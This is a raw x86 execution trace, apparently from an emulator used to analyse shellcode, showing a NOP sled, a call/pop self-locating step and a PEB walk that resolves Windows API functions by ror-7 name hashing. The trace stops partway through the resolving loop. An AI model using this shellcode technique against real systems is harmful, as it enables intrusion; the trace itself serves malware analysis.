eip = 91c05bc esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05BC:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05bd esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05BD:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05be esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05BE:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05bf esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05BF:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05c0 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05C0:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05c1 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05C1:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05c2 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05C2:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05c3 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05C3:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05c4 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05C4:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05c5 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05C5:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05c6 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05C6:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05c7 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05C7:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05c8 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05C8:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05c9 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05C9:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05ca esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05CA:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05cb esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05CB:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05cc esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05CC:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05cd esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05CD:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05ce esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05CE:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05cf esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05CF:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05d0 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05D0:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05d1 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05D1:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05d2 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05D2:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05d3 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05D3:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05d4 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05D4:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05d5 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05D5:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05d6 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05D6:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05d7 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05D7:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05d8 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05D8:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05d9 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05D9:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05da esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05DA:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05db esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05DB:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05dc esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05DC:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05dd esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05DD:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05de esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05DE:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05df esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05DF:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05e0 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05E0:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05e1 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05E1:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05e2 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05E2:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05e3 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05E3:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05e4 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05E4:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05e5 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05E5:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05e6 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05E6:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05e7 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05E7:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05e8 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05E8:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05e9 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05E9:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05ea esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05EA:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05eb esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05EB:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05ec esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05EC:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05ed esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05ED:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05ee esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05EE:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05ef esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05EF:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05f0 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05F0:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05f1 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05F1:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05f2 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05F2:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05f3 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05F3:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05f4 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05F4:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05f5 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05F5:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05f6 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05F6:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05f7 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05F7:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05f8 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05F8:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05f9 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05F9:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05fa esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05FA:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05fb esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05FB:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05fc esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05FC:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05fd esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05FD:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05fe esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05FE:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c05ff esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C05FF:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0600 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0600:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0601 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0601:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0602 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0602:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0603 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0603:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0604 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0604:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0605 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0605:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0606 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0606:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0607 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0607:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0608 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0608:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0609 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0609:: E9 57 02 00 00 jmp 0x91c0865
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0865 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0865:: E8 A4 FD FF FF call 0x91c060e ->
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c060e esp = 12cbec ebp = 10124 eflags = 200246
0x091C060E:: 5F pop edi
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c086a
eip = 91c060f esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C060F:: 57 push edi
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c086a
eip = 91c0610 esp = 12cbec ebp = 10124 eflags = 200246
0x091C0610:: 6A 0E push 0xe
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c086a
eip = 91c0612 esp = 12cbe8 ebp = 10124 eflags = 200246
0x091C0612:: 8B 0C 24 mov ecx, dword ptr [esp]
eax = 2a4949 ebx = 17d4b8 ecx = e edx = 8876f18 esi = 8877e9c edi = 91c086a
eip = 91c0615 esp = 12cbe8 ebp = 10124 eflags = 200246
0x091C0615:: 51 push ecx
eax = 2a4949 ebx = 17d4b8 ecx = e edx = 8876f18 esi = 8877e9c edi = 91c086a
eip = 91c0616 esp = 12cbe4 ebp = 10124 eflags = 200246
0x091C0616:: 57 push edi
eax = 2a4949 ebx = 17d4b8 ecx = e edx = 8876f18 esi = 8877e9c edi = 91c086a
eip = 91c0617 esp = 12cbe0 ebp = 10124 eflags = 200246
0x091C0617:: 33 FF xor edi, edi
eax = 2a4949 ebx = 17d4b8 ecx = e edx = 8876f18 esi = 8877e9c edi = 0
eip = 91c0619 esp = 12cbe0 ebp = 10124 eflags = 200246
0x091C0619:: 64 A1 30 00 00 00 mov eax, dword ptr fs:[0x30]
eax = 7ffd5000 ebx = 17d4b8 ecx = e edx = 8876f18 esi = 8877e9c edi = 0
eip = 91c061f esp = 12cbe0 ebp = 10124 eflags = 200246
0x091C061F:: 8B 40 0C mov eax, dword ptr [eax+0xc]
eax = 251e90 ebx = 17d4b8 ecx = e edx = 8876f18 esi = 8877e9c edi = 0
eip = 91c0622 esp = 12cbe0 ebp = 10124 eflags = 200246
0x091C0622:: 8B 70 1C mov esi, dword ptr [eax+0x1c]
eax = 251e90 ebx = 17d4b8 ecx = e edx = 8876f18 esi = 251f28 edi = 0
eip = 91c0625 esp = 12cbe0 ebp = 10124 eflags = 200246
0x091C0625:: AD lodsd dword ptr [esi]
eax = 251fd0 ebx = 17d4b8 ecx = e edx = 8876f18 esi = 251f2c edi = 0
eip = 91c0626 esp = 12cbe0 ebp = 10124 eflags = 200246
0x091C0626:: 8B 68 08 mov ebp, dword ptr [eax+0x8]
eax = 251fd0 ebx = 17d4b8 ecx = e edx = 8876f18 esi = 251f2c edi = 0
eip = 91c0629 esp = 12cbe0 ebp = 7c800000 eflags = 200246
0x091C0629:: 8B 45 3C mov eax, dword ptr [ebp+0x3c]
eax = f0 ebx = 17d4b8 ecx = e edx = 8876f18 esi = 251f2c edi = 0
eip = 91c062c esp = 12cbe0 ebp = 7c800000 eflags = 200246
0x091C062C:: 8B 54 05 78 mov edx, dword ptr [ebp+eax*1+0x78]
eax = f0 ebx = 17d4b8 ecx = e edx = 262c esi = 251f2c edi = 0
eip = 91c0630 esp = 12cbe0 ebp = 7c800000 eflags = 200246
0x091C0630:: 03 D5 add edx, ebp
eax = f0 ebx = 17d4b8 ecx = e edx = 7c80262c esi = 251f2c edi = 0
eip = 91c0632 esp = 12cbe0 ebp = 7c800000 eflags = 200202
0x091C0632:: 8B 5A 20 mov ebx, dword ptr [edx+0x20]
eax = f0 ebx = 3538 ecx = e edx = 7c80262c esi = 251f2c edi = 0
eip = 91c0635 esp = 12cbe0 ebp = 7c800000 eflags = 200202
0x091C0635:: 03 DD add ebx, ebp
eax = f0 ebx = 7c803538 ecx = e edx = 7c80262c esi = 251f2c edi = 0
eip = 91c0637 esp = 12cbe0 ebp = 7c800000 eflags = 200202
0x091C0637:: 47 inc edi
eax = f0 ebx = 7c803538 ecx = e edx = 7c80262c esi = 251f2c edi = 1
eip = 91c0638 esp = 12cbe0 ebp = 7c800000 eflags = 200202
0x091C0638:: 8B 34 BB mov esi, dword ptr [ebx+edi*4]
eax = f0 ebx = 7c803538 ecx = e edx = 7c80262c esi = 4baa edi = 1
eip = 91c063b esp = 12cbe0 ebp = 7c800000 eflags = 200202
0x091C063B:: 03 F5 add esi, ebp
eax = f0 ebx = 7c803538 ecx = e edx = 7c80262c esi = 7c804baa edi = 1
eip = 91c063d esp = 12cbe0 ebp = 7c800000 eflags = 200206
0x091C063D:: 33 C9 xor ecx, ecx
eax = f0 ebx = 7c803538 ecx = 0 edx = 7c80262c esi = 7c804baa edi = 1
eip = 91c063f esp = 12cbe0 ebp = 7c800000 eflags = 200246
0x091C063F:: 0F BE 06 movsx eax, byte ptr [esi]
eax = 41 ebx = 7c803538 ecx = 0 edx = 7c80262c esi = 7c804baa edi = 1
eip = 91c0642 esp = 12cbe0 ebp = 7c800000 eflags = 200246
0x091C0642:: 3A C4 cmp al, ah
eax = 41 ebx = 7c803538 ecx = 0 edx = 7c80262c esi = 7c804baa edi = 1
eip = 91c0644 esp = 12cbe0 ebp = 7c800000 eflags = 200206
0x091C0644:: 74 08 jz 0x91c064e
eax = 41 ebx = 7c803538 ecx = 0 edx = 7c80262c esi = 7c804baa edi = 1
eip = 91c0646 esp = 12cbe0 ebp = 7c800000 eflags = 200206
0x091C0646:: C1 C9 07 ror ecx, 0x7
eax = 41 ebx = 7c803538 ecx = 0 edx = 7c80262c esi = 7c804baa edi = 1
eip = 91c0649 esp = 12cbe0 ebp = 7c800000 eflags = 200206
0x091C0649:: 03 C8 add ecx, eax
eax = 41 ebx = 7c803538 ecx = 41 edx = 7c80262c esi = 7c804baa edi = 1
eip = 91c064b esp = 12cbe0 ebp = 7c800000 eflags = 200206
0x091C064B:: 46 inc esi
eax = 41 ebx = 7c803538 ecx = 41 edx = 7c80262c esi = 7c804bab edi = 1
eip = 91c064c esp = 12cbe0 ebp = 7c800000 eflags = 200202
0x091C064C:: EB F1 jmp 0x91c063f
eax = 41 ebx = 7c803538 ecx = 41 edx = 7c80262c esi = 7c804bab edi = 1
eip = 91c063f esp = 12cbe0 ebp = 7c800000 eflags = 200202
0x091C063F:: 0F BE 06 movsx eax, byte ptr [esi]
eax = 64 ebx = 7c803538 ecx = 41 edx = 7c80262c esi = 7c804bab edi = 1
eip = 91c0642 esp = 12cbe0 ebp = 7c800000 eflags = 200202
0x091C0642:: 3A C4 cmp al, ah
eax = 64 ebx = 7c803538 ecx = 41 edx = 7c80262c esi = 7c804bab edi = 1
eip = 91c0644 esp = 12cbe0 ebp = 7c800000 eflags = 200202
0x091C0644:: 74 08 jz 0x91c064e
eax = 0 ebx = 7c803538 ecx = 74e0245e edx = 7c80262c esi = 7c804bb2 edi = 1
eip = 91c064e esp = 12cbe0 ebp = 7c800000 eflags = 200246
0x091C064E:: 8B 04 24 mov eax, dword ptr [esp]
eax = 91c086a ebx = 7c803538 ecx = 74e0245e edx = 7c80262c esi = 7c804bb2 edi = 1
eip = 91c0651 esp = 12cbe0 ebp = 7c800000 eflags = 200246
0x091C0651:: 3B 08 cmp ecx, dword ptr [eax]
eax = 91c086a ebx = 7c803538 ecx = 74e0245e edx = 7c80262c esi = 7c804bb2 edi = 1
eip = 91c0653 esp = 12cbe0 ebp = 7c800000 eflags = 200a87
0x091C0653:: 75 E2 jnz 0x91c0637
eax = 91c086a ebx = 7c803538 ecx = 74e0245e edx = 7c80262c esi = 7c804bb2 edi = 1
eip = 91c0637 esp = 12cbe0 ebp = 7c800000 eflags = 200a87
0x091C0637:: 47 inc edi
eax = 91c086a ebx = 7c803538 ecx = 74e0245e edx = 7c80262c esi = 7c804bb2 edi = 2
eip = 91c0638 esp = 12cbe0 ebp = 7c800000 eflags = 200203
0x091C0638:: 8B 34 BB mov esi, dword ptr [ebx+edi*4]
eax = 91c086a ebx = 7c803538 ecx = 74e0245e edx = 7c80262c esi = 4bb3 edi = 2
eip = 91c063b esp = 12cbe0 ebp = 7c800000 eflags = 200203
0x091C063B:: 03 F5 add esi, ebp
eax = 91c086a ebx = 7c803538 ecx = 74e0245e edx = 7c80262c esi = 7c804bb3 edi = 2
eip = 91c063d esp = 12cbe0 ebp = 7c800000 eflags = 200202
0x091C063D:: 33 C9 xor ecx, ecx
eax = 91c086a ebx = 7c803538 ecx = 0 edx = 7c80262c esi = 7c804bb3 edi = 2
eip = 91c063f esp = 12cbe0 ebp = 7c800000 eflags = 200246
0x091C063F:: 0F BE 06 movsx eax, byte ptr [esi]
eax = 41 ebx = 7c803538 ecx = 0 edx = 7c80262c esi = 7c804bb3 edi = 2
eip = 91c0642 esp = 12cbe0 ebp = 7c800000 eflags = 200246
0x091C0642:: 3A C4 cmp al, ah
eax = 41 ebx = 7c803538 ecx = 0 edx = 7c80262c esi = 7c804bb3 edi = 2
eip = 91c0644 esp = 12cbe0 ebp = 7c800000 eflags = 200206
0x091C0644:: 74 08 jz 0x91c064e
eax = 91c086a ebx = 7c803538 ecx = e58b879b edx = 7c80262c esi = 7c805f29 edi = 109
eip = 91c0655 esp = 12cbe0 ebp = 7c800000 eflags = 200246
0x091C0655:: 8B 5A 24 mov ebx, dword ptr [edx+0x24]
eax = 91c086a ebx = 441c ecx = e58b879b edx = 7c80262c esi = 7c805f29 edi = 109
eip = 91c0658 esp = 12cbe0 ebp = 7c800000 eflags = 200246
0x091C0658:: 03 DD add ebx, ebp
eax = 91c086a ebx = 7c80441c ecx = e58b879b edx = 7c80262c esi = 7c805f29 edi = 109
eip = 91c065a esp = 12cbe0 ebp = 7c800000 eflags = 200202
0x091C065A:: 66 8B 0C 7B mov cx, word ptr [ebx+edi*2]
eax = 91c086a ebx = 7c80441c ecx = e58b0109 edx = 7c80262c esi = 7c805f29 edi = 109
eip = 91c065e esp = 12cbe0 ebp = 7c800000 eflags = 200202
0x091C065E:: 8B 5A 1C mov ebx, dword ptr [edx+0x1c]
eax = 91c086a ebx = 2654 ecx = e58b0109 edx = 7c80262c esi = 7c805f29 edi = 109
eip = 91c0661 esp = 12cbe0 ebp = 7c800000 eflags = 200202
0x091C0661:: 03 DD add ebx, ebp
eax = 91c086a ebx = 7c802654 ecx = e58b0109 edx = 7c80262c esi = 7c805f29 edi = 109
eip = 91c0663 esp = 12cbe0 ebp = 7c800000 eflags = 200202
0x091C0663:: 8B 04 BB mov eax, dword ptr [ebx+edi*4]
eax = 12fad ebx = 7c802654 ecx = e58b0109 edx = 7c80262c esi = 7c805f29 edi = 109
eip = 91c0666 esp = 12cbe0 ebp = 7c800000 eflags = 200202
0x091C0666:: 03 C5 add eax, ebp
eax = 7c812fad ebx = 7c802654 ecx = e58b0109 edx = 7c80262c esi = 7c805f29 edi = 109
eip = 91c0668 esp = 12cbe0 ebp = 7c800000 eflags = 200202
0x091C0668:: 5F pop edi
eax = 7c812fad ebx = 7c802654 ecx = e58b0109 edx = 7c80262c esi = 7c805f29 edi = 91c086a
eip = 91c0669 esp = 12cbe4 ebp = 7c800000 eflags = 200202
0x091C0669:: AB stosd dword ptr [edi]
eax = 7c812fad ebx = 7c802654 ecx = e58b0109 edx = 7c80262c esi = 7c805f29 edi = 91c086e
eip = 91c066a esp = 12cbe4 ebp = 7c800000 eflags = 200202
0x091C066A:: 59 pop ecx
eax = 7c812fad ebx = 7c802654 ecx = e edx = 7c80262c esi = 7c805f29 edi = 91c086e
eip = 91c066b esp = 12cbe8 ebp = 7c800000 eflags = 200202
0x091C066B:: E2 A8 loop 0x91c0615
eax = 7c812fad ebx = 7c802654 ecx = d edx = 7c80262c esi = 7c805f29 edi = 91c086e
eip = 91c0615 esp = 12cbe8 ebp = 7c800000 eflags = 200202
0x091C0615:: 51 push ecx
eax = 7c812fad ebx = 7c802654 ecx = d edx = 7c80262c esi = 7c805f29 edi = 91c086e
eip = 91c0616 esp = 12cbe4 ebp = 7c800000 eflags = 200202
0x091C0616:: 57 push edi
eax = 7c812fad ebx = 7c802654 ecx = d edx = 7c80262c esi = 7c805f29 edi = 91c086e
eip = 91c0617 esp = 12cbe0 ebp = 7c800000 eflags = 200202
0x091C0617:: 33 FF xor edi, edi
eax = 7c812fad ebx = 7c802654 ecx = d edx = 7c80262c esi = 7c805f29 edi = 0
eip = 91c0619 esp = 12cbe0 ebp = 7c800000 eflags = 200246
0x091C0619:: 64 A1 30 00 00 00 mov eax, dword ptr fs:[0x30]
eax = 7ffd5000 ebx = 7c802654 ecx = d edx = 7c80262c esi = 7c805f29 edi = 0
eip = 91c061f esp = 12cbe0 ebp = 7c800000 eflags = 200246
0x091C061F:: 8B 40 0C mov eax, dword ptr [eax+0xc]
eax = 251e90 ebx = 7c802654 ecx = d edx = 7c80262c esi = 7c805f29 edi = 0
eip = 91c0622 esp = 12cbe0 ebp = 7c800000 eflags = 200246
0x091C0622:: 8B 70 1C mov esi, dword ptr [eax+0x1c]
eax = 251e90 ebx = 7c802654 ecx = d edx = 7c80262c esi = 251f28 edi = 0
eip = 91c0625 esp = 12cbe0 ebp = 7c800000 eflags = 200246
